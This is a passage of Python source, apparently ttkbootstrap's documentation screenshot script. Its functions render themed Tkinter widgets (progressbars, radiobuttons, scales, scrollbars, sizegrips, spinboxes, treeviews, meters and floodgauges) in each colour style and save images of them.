window = style.master
window.title('ttkbootstrap')
window.geometry('600x400')
ss = Screenshot(window, '../images/progressbar_horizontal_striped.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Striped.Horizontal.TProgressbar', font='Helvetica 10 bold', anchor='center').pack(fill='x',
pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Striped.Horizontal.TProgressbar').pack(fill='x', padx=10)
ttk.Progressbar(f1, value=75, style=f'{c}.Striped.Horizontal.TProgressbar').pack(fill='x', expand='yes',
padx=10,
pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_progressbar_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal progressbars
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('600x400')
ss = Screenshot(window, '../images/progressbar_vertical.png')
import tkinter as tk
canvas = tk.Canvas(window, border=0, highlightthickness=0)
canvas.pack(fill='both', side='left', expand='yes')
ttk.Label(canvas, text='Vertical.TProgressbar', font='Helvetica 10 bold', anchor='center').pack(fill='x',
pady=(10, 5))
ttk.Separator(canvas).pack(fill='x', padx=5, pady=(5, 10))
i = 50
for c in style.colors:
canvas.create_text((i, 200), text=f'{c}.Vertical.TProgressbar', angle=90, font='Helvetica 10')
pb = ttk.Progressbar(canvas, value=75, style=f'{c}.Vertical.TProgressbar', orient='vertical', length=300)
i += 25
canvas.create_window((i, 225), window=pb)
i += 70
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_radiobutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a radiobutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('272x310')
ss = Screenshot(window, '../images/radiobutton.png')
f1 = ttk.Frame(window, padding=10)
f1.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f1, text='TRadiobutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=5)
window.setvar('option', 1)
# buttons
for s in style.colors:
b = ttk.Radiobutton(f1, text=f'{s}.TRadiobutton', variable='option', value=1, style=f'{s}.TRadiobutton')
b.pack(fill='x', padx=5, pady=10)
ttk.Radiobutton(f1, text='unselected').pack(fill='x', padx=5, pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_radiobutton_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for radiobutton toolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/radiobutton_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Radiobutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-b', text='Radio', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-c', text='Radio', style=f'{c}.Toolbutton', padding=5, width=10).pack(
side='left', pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_radiobutton_outline_toolbutton(screenshot_on=True, theme='flatly'):
"""
Get screenshot for radiobutton outlinetoolbutton
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/radiobutton_outline_toolbutton.png')
f5 = ttk.Frame(window, padding=10)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text='Outline.Toolbutton', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=(5, 10))
def create_frame(parent, c):
"""Create frame for each item and insert widgets"""
parent.setvar(f'{c}-a', True)
parent.setvar(f'{c}-b', False)
parent.setvar(f'{c}-c', False)
ttk.Label(parent, text=f'{c}.Outline.Toolbutton').pack(padx=5, pady=(5, 0), fill='x')
frame = ttk.Frame(parent)
frame.pack()
ttk.Radiobutton(frame, variable=f'{c}-a', text='Selected', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-b', text='Radio', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', pady=(5, 10), fill='x')
ttk.Radiobutton(frame, variable=f'{c}-c', text='Radio', style=f'{c}.Outline.Toolbutton', padding=5,
width=10).pack(
side='left', pady=(5, 10), fill='x')
return frame
for c in style.colors:
create_frame(f5, c).pack()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scale_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal scale
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('500x400')
ss = Screenshot(window, '../images/scale_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TScale', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Horizontal.TScale').pack(fill='x', padx=10)
ttk.Scale(f1, value=75, from_=0, to=100, style=f'{c}.Horizontal.TScale', length=300).pack(fill='x',
expand='yes', padx=10,
pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scale_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for vertical
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('500x400')
ss = Screenshot(window, '../images/scale_vertical.png')
import tkinter as tk
canvas = tk.Canvas(window, border=0, highlightthickness=0)
canvas.pack(fill='both', side='left', expand='yes')
ttk.Label(canvas, text='Vertical.TScale', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=(10, 5))
ttk.Separator(canvas).pack(fill='x', padx=5, pady=(5, 10))
i = 40
for c in style.colors:
canvas.create_text((i, 200), text=f'{c}.Vertical.TScale', angle=90, font='Helvetica 10')
pb = ttk.Scale(canvas, from_=1, to=100, value=75, style=f'{c}.Vertical.TScale', orient='vertical', length=300)
i += 25
canvas.create_window((i, 225), window=pb)
i += 50
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scrollbar_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal scrollbar
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('400x125')
ss = Screenshot(window, '../images/scrollbar_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TScrollbar', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
hs = ttk.Scrollbar(f1, orient='horizontal')
hs.pack(fill='x', padx=10, pady=10)
hs.set(0.2, 0.3)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_scrollbar_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal scrollbar
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('150x400')
ss = Screenshot(window, '../images/scrollbar_vertical.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Vertical.TScrollbar', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f1).pack(fill='x', padx=5, pady=(5, 10))
# widgets
hs = ttk.Scrollbar(f1, orient='vertical')
hs.pack(fill='y', padx=10, pady=10, expand='yes')
hs.set(0.2, 0.3)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_separator_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal separator
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('475x400')
ss = Screenshot(window, '../images/separator_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text='Horizontal.TSeparator', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=(5, 15))
# widgets
for c in style.colors:
ttk.Label(f1, text=f'{c}.Horizontal.TSeparator').pack(fill='x', padx=10)
ttk.Separator(f1, style=f'{c}.Horizontal.TSeparator').pack(fill='x', expand='yes', padx=10, pady=(0, 10))
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_separator_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for vertical separator
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('475x400')
ss = Screenshot(window, '../images/separator_vertical.png')
import tkinter as tk
canvas = tk.Canvas(window, borderwidth=0, relief='flat', highlightthickness=0)
canvas.pack(fill='both', side='left', expand='yes')
ttk.Label(canvas, text='Vertical.TSeparator', font='Helvetica 10 bold', anchor='center').pack(fill='x',
pady=(5, 20))
i = 40
for c in style.colors:
canvas.create_text((i, 200), text=f'{c}.Vertical.TSeparator', angle=90, font='Helvetica 10')
pb = ttk.Separator(canvas, style=f'{c}.Vertical.TSeparator', orient='vertical')
i += 25
canvas.create_window((i, 215), window=pb, height=300)
i += 50
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
ss = Screenshot(window, f'../images/sizegrip.png')
ttk.Label(text='TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip().pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_primary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'primary'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_secondary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'secondary'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_success(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'success'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_info(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'info'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_warning(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'warning'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_danger(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'danger'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_primary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'primary'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_secondary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'secondary'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_success(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'success'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_info(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'info'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_warning(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'warning'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_danger(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'danger'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_primary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'primary'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_secondary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'secondary'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_success(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'success'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_info(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'info'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_warning(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'warning'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_danger(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'danger'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_meter(screenshot_on=True, theme='flatly'):
"""
Get screenshot for meter
"""
from ttkbootstrap.widgets import Meter
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/meter.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# widgets
n = 50
for i, c in enumerate(style.colors):
if i < 3:
m = Meter(f1, amountused=n + (i*10), meterstyle=f'{c}.TMeter', labeltext=f'{c}.TMeter')
m.grid(row=0, column=i, padx=10, pady=10)
else:
m = Meter(f1, amountused=n + (i*10), meterstyle=f'{c}.TMeter', labeltext=f'{c}.TMeter')
m.grid(row=1, column=i-3, padx=10, pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_floodgauge_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal floodgauges
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('800x500')
ss = Screenshot(window, '../images/floodgauge_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
for x in [2, 4]:
f1.rowconfigure(x, weight=1)
for y in range(3):
f1.columnconfigure(y, weight=1)
l = ttk.Label(f1, text='Horizontal.TFloodgauge', font='Helvetica 10 bold', anchor='center')
l.grid(row=0, column=0, columnspan=3, pady=10)
# widgets
for i, c in enumerate(style.colors):
s = f'{c}.Horizontal.TFloodgauge'
value = 50 + i * 10
wl = ttk.Label(f1, text=s, anchor='center', padding=(0, 10, 0, 0))
w = widgets.Floodgauge(f1, value=value, text=f'{value}K', style=s, font='helvetica 24 bold')
if i < 3:
wl.grid(row=1, column=i, sticky='sew')
w.grid(row=2, column=i, sticky='news', ipady=10, padx=5, pady=5)
else:
wl.grid(row=3, column=i-3, sticky='sew')
w.grid(row=4, column=i-3, sticky='news', ipady=10, pady=5, padx=5)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_floodgauge_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for vertical floodgauges
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('800x500')
ss = Screenshot(window, '../images/floodgauge_vertical.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
for x in [2, 4]:
f1.rowconfigure(x, weight=1)
for y in range(3):
f1.columnconfigure(y, weight=1)
l = ttk.Label(f1, text='Vertical.TFloodgauge', font='Helvetica 10 bold', anchor='center')
l.grid(row=0, column=0, columnspan=3, pady=10)
# widgets
for i, c in enumerate(style.colors):
s = f'{c}.Vertical.TFloodgauge'
value = 50 + i * 10
wl = ttk.Label(f1, text=s, anchor='center', padding=(0, 10, 0, 0))
w = widgets.Floodgauge(f1, value=value, text=f'{value}K', style=s, orient='vertical', font='helvetica 24 bold')
if i < 3:
wl.grid(row=1, column=i, sticky='sew')
w.grid(row=2, column=i, sticky='news', ipady=10, padx=5, pady=5)
else:
wl.grid(row=3, column=i-3, sticky='sew')
w.grid(row=4, column=i-3, sticky='news', ipady=10, pady=5, padx=5)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_date_entry(screenshot_on=True, theme='flatly'):
"""
Get screenshot for date entry
"""
from ttkbootstrap.widgets.calendar import DateEntry
from datetime import datetime
